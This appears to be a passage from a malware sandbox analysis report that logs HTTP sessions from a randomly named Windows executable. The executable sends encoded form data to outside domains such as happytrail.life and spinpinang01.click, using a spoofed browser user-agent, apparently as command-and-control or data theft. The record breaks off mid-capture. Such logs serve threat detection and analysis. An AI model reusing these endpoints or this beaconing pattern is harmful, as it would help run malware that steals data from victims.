Jan 11, 2025 02:54:04.613801956 CET	394	OUT	GET /izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.elinor.club Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Jan 11, 2025 02:54:05.302099943 CET	473	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 11 Jan 2025 01:54:05 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49976	199.192.23.123	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:10.352336884 CET	668	OUT	POST /kbdb/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.happytrail.life Origin: http://www.happytrail.life Referer: http://www.happytrail.life/kbdb/ Content-Type: application/x-www-form-urlencoded Content-Length: 194 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 72 71 4e 5a 58 51 32 4e 31 5a 52 4a 4c 78 64 68 74 7a 6c 42 68 56 6a 77 2b 34 35 71 6d 56 49 4b 67 6c 37 56 4c 36 53 76 45 30 54 44 75 48 4a 77 76 72 57 49 4a 57 4d 59 31 48 37 35 53 36 56 65 35 51 52 54 75 67 66 78 6c 37 70 36 59 6c 5a 55 63 65 6b 58 52 67 57 32 72 30 55 39 4c 31 58 4d 30 47 77 37 46 38 6c 35 75 70 64 6b 4f 50 63 74 49 69 32 37 43 64 45 43 66 62 41 2b 37 54 44 62 62 75 5a 4f 50 6d 4c 49 32 36 37 4f 41 38 53 31 6b 6a 50 77 47 38 75 45 48 42 48 58 4b 6f 48 64 74 70 4c 67 45 64 47 30 59 71 7a 41 39 47 7a 7a Data Ascii: 0lTTc=4v6oa3BkpwCMrqNZXQ2N1ZRJLxdhtzlBhVjw+45qmVIKgl7VL6SvE0TDuHJwvrWIJWMY1H75S6Ve5QRTugfxl7p6YlZUcekXRgW2r0U9L1XM0Gw7F8l5updkOPctIi27CdECfbA+7TDbbuZOPmLI267OA8S1kjPwG8uEHBHXKoHdtpLgEdG0YqzA9Gzz
Jan 11, 2025 02:54:10.942410946 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:54:10 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49977	199.192.23.123	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:12.898633957 CET	692	OUT	POST /kbdb/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.happytrail.life Origin: http://www.happytrail.life Referer: http://www.happytrail.life/kbdb/ Content-Type: application/x-www-form-urlencoded Content-Length: 218 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 71 4c 39 5a 51 33 71 4e 77 35 52 4b 48 52 64 68 30 6a 6c 46 68 55 66 77 2b 36 56 36 6e 6a 59 4b 67 41 48 56 4b 37 53 76 48 30 54 44 32 58 4a 35 69 4c 57 50 4a 57 77 51 31 47 58 35 53 37 78 65 35 52 68 54 75 54 6e 75 6c 72 70 34 58 46 5a 73 52 2b 6b 58 52 67 57 32 72 30 77 48 4c 31 2f 4d 31 32 41 37 45 64 6c 2b 31 4a 64 6e 48 76 63 74 4d 69 32 2f 43 64 46 74 66 61 4d 55 37 52 37 62 62 76 70 4f 4f 33 4c 50 34 36 36 48 64 4d 54 51 72 57 53 6f 4a 70 4f 35 47 78 66 4d 61 36 6a 62 71 49 32 6e 56 4d 6e 6a 4c 64 76 4f 7a 41 47 5a 4b 32 76 4b 53 6f 34 41 74 51 6d 74 67 67 6c 39 45 6a 63 34 33 67 3d 3d Data Ascii: 0lTTc=4v6oa3BkpwCMqL9ZQ3qNw5RKHRdh0jlFhUfw+6V6njYKgAHVK7SvH0TD2XJ5iLWPJWwQ1GX5S7xe5RhTuTnulrp4XFZsR+kXRgW2r0wHL1/M12A7Edl+1JdnHvctMi2/CdFtfaMU7R7bbvpOO3LP466HdMTQrWSoJpO5GxfMa6jbqI2nVMnjLdvOzAGZK2vKSo4AtQmtggl9Ejc43g==
Jan 11, 2025 02:54:13.473365068 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:54:13 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49978	199.192.23.123	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:15.537826061 CET	1705	OUT	POST /kbdb/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.happytrail.life Origin: http://www.happytrail.life Referer: http://www.happytrail.life/kbdb/ Content-Type: application/x-www-form-urlencoded Content-Length: 1230 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 71 4c 39 5a 51 33 71 4e 77 35 52 4b 48 52 64 68 30 6a 6c 46 68 55 66 77 2b 36 56 36 6e 6a 51 4b 67 79 66 56 4c 59 36 76 47 30 54 44 36 33 4a 30 69 4c 57 53 4a 57 59 55 31 47 4c 70 53 35 35 65 35 7a 70 54 35 32 4c 75 75 72 70 34 56 46 5a 58 63 65 6b 47 52 67 47 74 72 30 41 48 4c 31 2f 4d 31 30 6f 37 55 38 6c 2b 33 4a 64 6b 4f 50 63 68 49 69 32 48 43 63 73 61 66 61 59 75 37 68 62 62 62 50 35 4f 4d 46 7a 50 6e 4b 36 46 65 4d 54 79 72 57 57 4a 4a 70 36 44 47 79 43 5a 61 34 44 62 6f 64 48 47 45 65 58 4c 65 63 48 47 7a 47 53 35 59 79 50 68 51 37 35 47 37 7a 6d 6e 30 6b 67 70 42 6a 51 32 70 68 50 79 4a 33 50 52 57 37 34 79 4f 44 4f 79 32 4b 41 67 64 72 79 32 52 63 43 4f 67 42 6c 6e 73 71 4a 72 56 32 69 45 34 56 51 39 4f 61 54 31 5a 70 34 79 5a 65 30 66 56 62 63 79 4e 39 71 70 35 4f 34 2b 43 41 74 67 55 4f 50 70 74 72 34 36 4a 61 43 73 42 6d 63 62 65 45 43 4c 63 68 52 52 4a 64 7a 6a 32 51 6a 78 68 6f 52 38 41 62 64 79 48 30 37 4b 65 44 2f 77 36 45 4c 31 [TRUNCATED] Data Ascii: 0lTTc=4v6oa3BkpwCMqL9ZQ3qNw5RKHRdh0jlFhUfw+6V6njQKgyfVLY6vG0TD63J0iLWSJWYU1GLpS55e5zpT52Luurp4VFZXcekGRgGtr0AHL1/M10o7U8l+3JdkOPchIi2HCcsafaYu7hbbbP5OMFzPnK6FeMTyrWWJJp6DGyCZa4DbodHGEeXLecHGzGS5YyPhQ75G7zmn0kgpBjQ2phPyJ3PRW74yODOy2KAgdry2RcCOgBlnsqJrV2iE4VQ9OaT1Zp4yZe0fVbcyN9qp5O4+CAtgUOPptr46JaCsBmcbeECLchRRJdzj2QjxhoR8AbdyH07KeD/w6EL1525Hw6xSk07SPvW6kiHabpPBrFwABm9gSwH13xnj0vgEY0EdhG0GBouQ8FXix4dmLUbxiumZeAFXT+7Va3/1NXsWEHBHXfKyJnfq4Gq+5gaCE8DCT7P+86BfLpkwOG5pfQ+leR936UFGXlzPBal7kPY9KElm40KsHXz21DJXnoVUyW0aNMTBp3LVvoi57/QBjXExdSW5SjGNRo7rO+w2X/g+b9X6VRn9G1wzv3iaAKstSZSCj3mEylnT9xFwZajxvlphBFVuojO5yQsUjbR6S7jr9LiyMC8WhGiJhxdHu28OMHEJtJKpMHlvGjwKVZo7Tjh4IK4vuBI5nAEXGHHREZ+pYOXd0HIEaXMk0P4u5viJRt80TAKBqh4ZaKO9wz9I3s3SG2/CAkfwVK9B3dknDP6GNA60LSI7hGvTltxBCT2+iBrttp78gN2kDrzHc5cNSBFrETgDWsJkT7DMnF6kYngnt7KpEEZbp21jkxqT8b8JKkgsFSBxfTnx9qeasmQRkpyUMTC6mHT816RThsCC6A9WREKYPNozSNGdbU9GyldB2eRPC7jCIePPhV8H5HUkovF2WCiyZKwrJeH/O81T9zIAczRlI1uQZuj+d/udfKb2Ddl0gpzvgHsaYoqjMdld91hqzb/bt6wHvtu1brNgbGUCtMdoVjEFJk [TRUNCATED]
Jan 11, 2025 02:54:16.082485914 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:54:15 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49979	199.192.23.123	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:18.151704073 CET	398	OUT	GET /kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.happytrail.life Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Jan 11, 2025 02:54:18.703166008 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:54:18 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49980	66.29.146.78	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:23.766625881 CET	677	OUT	POST /01kd/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.spinpinang01.click Origin: http://www.spinpinang01.click Referer: http://www.spinpinang01.click/01kd/ Content-Type: application/x-www-form-urlencoded Content-Length: 194 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 54 6c 4a 59 6f 67 61 74 70 51 78 4c 6e 2b 69 67 79 55 49 6e 6e 62 48 43 36 32 35 4f 2b 64 30 48 47 42 2b 37 46 35 64 4d 2b 50 6a 62 35 69 41 64 2f 4a 48 7a 4e 61 7a 5a 6e 57 37 32 54 66 58 55 38 47 41 58 6a 45 46 2f 4c 34 6f 4e 64 45 36 46 6d 69 31 43 69 79 51 34 72 72 37 5a 35 69 61 75 54 75 6a 39 53 71 32 6a 31 62 75 65 4c 73 79 52 61 57 71 6b 39 43 76 59 57 4a 4d 55 7a 6d 2f 68 6c 37 4e 51 35 41 2b 58 46 70 43 6e 55 42 6b 65 57 6a 71 4c 76 79 4c 71 35 30 64 32 77 4a 45 53 46 69 4a 69 6d 31 41 57 65 31 46 39 7a 5a 66 6a Data Ascii: 0lTTc=My1WNoSFbjGGTlJYogatpQxLn+igyUInnbHC625O+d0HGB+7F5dM+Pjb5iAd/JHzNazZnW72TfXU8GAXjEF/L4oNdE6Fmi1CiyQ4rr7Z5iauTuj9Sq2j1bueLsyRaWqk9CvYWJMUzm/hl7NQ5A+XFpCnUBkeWjqLvyLq50d2wJESFiJim1AWe1F9zZfj
Jan 11, 2025 02:54:24.351911068 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 01:54:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED] Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=\|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? Gyg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
Jan 11, 2025 02:54:24.351939917 CET	1236	IN	Data Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6 Data Ascii: OH_3RymnQ{3/Kzn\|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
Jan 11, 2025 02:54:24.351958036 CET	448	IN	Data Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
Jan 11, 2025 02:54:24.352143049 CET	1236	IN	Data Raw: b4 56 62 8f ca d6 fc 7e 46 d1 24 39 d4 b4 19 32 57 8a d5 01 ab c2 8d 67 4f d2 00 09 54 29 37 f9 b5 70 48 18 da c5 f6 63 d2 c0 5b b9 0b b3 90 2f f4 04 4b eb c0 a1 34 9d a5 29 a9 5d e9 f4 06 5d 8c 54 ba dc 57 ac 7a 92 65 7f 9a 43 28 2c 59 dd 51 a0 Data Ascii: Vb~F$92WgOT)7pHc[/K4)]]TWzeC(,YQs1U!e8g;>QNP$I;ywLP*[%]u>:h#q8'h<=286X"/3_d&mmuyvfu.;+]
Jan 11, 2025 02:54:24.352159977 CET	1080	IN	Data Raw: 1c 40 d1 0f 97 f7 e4 09 55 24 e5 08 ed dd 1d 08 98 0e 45 0c c9 51 ab 9a 9e 42 e5 3b c6 46 7c 68 3a 0b 67 66 a8 14 e3 82 68 d0 5d d1 38 fb ca 3a e7 e8 70 b5 64 17 de 2e cf e5 50 e0 86 e1 fa 58 60 23 34 5b 67 91 31 a4 a7 63 83 9c 08 e9 56 6a 5b 32 Data Ascii: @U$EQB;F\|h:gfh]8:pd.PX`#4[g1cVj[2h1h\|`\0MXnM]C DuxN.?eB0D fC,Z\u3P5JuT>a)D6C6@7KVcvxXTS)$ZW\|XPiFaFSht<>#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49981	66.29.146.78	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:26.318356991 CET	701	OUT	POST /01kd/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.spinpinang01.click Origin: http://www.spinpinang01.click Referer: http://www.spinpinang01.click/01kd/ Content-Type: application/x-www-form-urlencoded Content-Length: 218 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 4a 45 5a 59 6c 6a 79 74 34 67 78 4b 70 65 69 67 34 30 4a 73 6e 62 37 43 36 7a 4a 65 2b 76 41 48 47 67 4f 37 45 37 31 4d 39 50 6a 62 78 43 41 53 37 4a 48 34 4e 61 76 4f 6e 55 76 32 54 65 7a 55 38 45 6f 58 6a 7a 70 38 4b 6f 6f 31 56 6b 36 4c 69 69 31 43 69 79 51 34 72 72 75 30 35 69 43 75 54 2b 7a 39 54 4c 32 6b 72 4c 75 64 4d 73 79 52 4e 47 71 6f 39 43 76 36 57 4d 73 2b 7a 6a 7a 68 6c 34 5a 51 36 56 4b 59 50 70 43 70 4d 68 6c 72 53 79 58 64 67 43 48 6b 78 48 46 56 6e 34 51 42 47 44 30 6c 33 6b 68 42 4e 43 5a 7a 39 66 71 4a 63 4f 33 41 56 67 79 51 5a 65 36 2f 6e 6d 4c 65 41 50 70 54 46 